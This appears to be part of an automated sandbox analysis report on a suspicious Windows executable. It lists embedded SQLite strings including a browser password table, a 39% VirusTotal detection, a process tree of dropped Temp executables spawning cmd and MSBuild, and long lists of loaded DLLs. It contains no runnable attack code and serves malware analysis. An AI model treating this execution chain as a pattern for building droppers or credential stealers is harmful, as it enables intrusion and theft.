                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: u3z0.0.exe, u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: u3z0.0.exe, 00000002.00000003.2123311987.000000002484E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: u3z0.0.exe, 00000002.00000002.2468015934.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: 4BfhCycV4B.exe; Virustotal: Detection: 39%
Source: C:\Users\user\Desktop\4BfhCycV4B.exe; File read: C:\Users\user\Desktop\4BfhCycV4B.exe
Source: unknown; Process created: C:\Users\user\Desktop\4BfhCycV4B.exe "C:\Users\user\Desktop\4BfhCycV4B.exe"
Source: C:\Users\user\Desktop\4BfhCycV4B.exe; Process created: C:\Users\user\AppData\Local\Temp\u3z0.0.exe "C:\Users\user\AppData\Local\Temp\u3z0.0.exe"
Source: C:\Users\user\Desktop\4BfhCycV4B.exe; Process created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe"
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe; Process created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe; Process created: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4BfhCycV4B.exe; Process created: C:\Users\user\AppData\Local\Temp\u3z0.1.exe "C:\Users\user\AppData\Local\Temp\u3z0.1.exe"
Source: C:\Users\user\Desktop\4BfhCycV4B.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 1124
Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 2188
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exe; Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Source: unknown; Process created: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe "C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe"
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\4BfhCycV4B.exe; Section loaded: apphelp.dll, winhttp.dll, msimg32.dll, msvcr100.dll, mswsock.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, uxtheme.dll, propsys.dll, profapi.dll, windows.staterepositoryps.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe; Section loaded: apphelp.dll, winhttp.dll, msimg32.dll, msvcr100.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dpapi.dll, cryptbase.dll, ntmarta.dll, mozglue.dll, wsock32.dll, vcruntime140.dll, msvcp140.dll, uxtheme.dll, propsys.dll, linkinfo.dll, windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe; Section loaded: msimg32.dll, version.dll, uxtheme.dll, kernel.appcore.dll, textshaping.dll, winhttp.dll, windowscodecs.dll, pla.dll, pdh.dll, tdh.dll, cabinet.dll, wevtapi.dll, shdocvw.dll, apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe; Section loaded: uxtheme.dll, version.dll, msimg32.dll, oledlg.dll, oleacc.dll, winmm.dll, wininet.dll, netapi32.dll, wtsapi32.dll, netutils.dll, samcli.dll, dwmapi.dll, riched20.dll, usp10.dll, msls31.dll, windows.storage.dll, wldp.dll, profapi.dll, dbghelp.dll, pla.dll, pdh.dll, tdh.dll, cabinet.dll, wevtapi.dll, shdocvw.dll, ntmarta.dll, apphelp.dll
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe; Section loaded: uxtheme.dll, version.dll, msimg32.dll, oledlg.dll, oleacc.dll, winmm.dll, wininet.dll, netapi32.dll, wtsapi32.dll, netutils.dll, samcli.dll, dwmapi.dll, riched20.dll, usp10.dll, msls31.dll, windows.storage.dll, wldp.dll, profapi.dll, dbghelp.dll, pla.dll, pdh.dll, tdh.dll, cabinet.dll, wevtapi.dll, shdocvw.dll, winhttp.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wsock32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: winsta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: security.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: olepro32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: schedcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: msxml6.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: idndl.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: bitsproxy.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: dwmapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dwrite.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msvcp140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: windowscodecs.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dwmapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d9.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d10warp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wtsapi32.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winsta.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: powrprof.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: umpdc.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: textshaping.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dataexchange.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d11.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dcomp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dxgi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: twinapi.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: resourcepolicyclient.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dxcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: textinputframework.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coreuicomponents.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coremessaging.dll
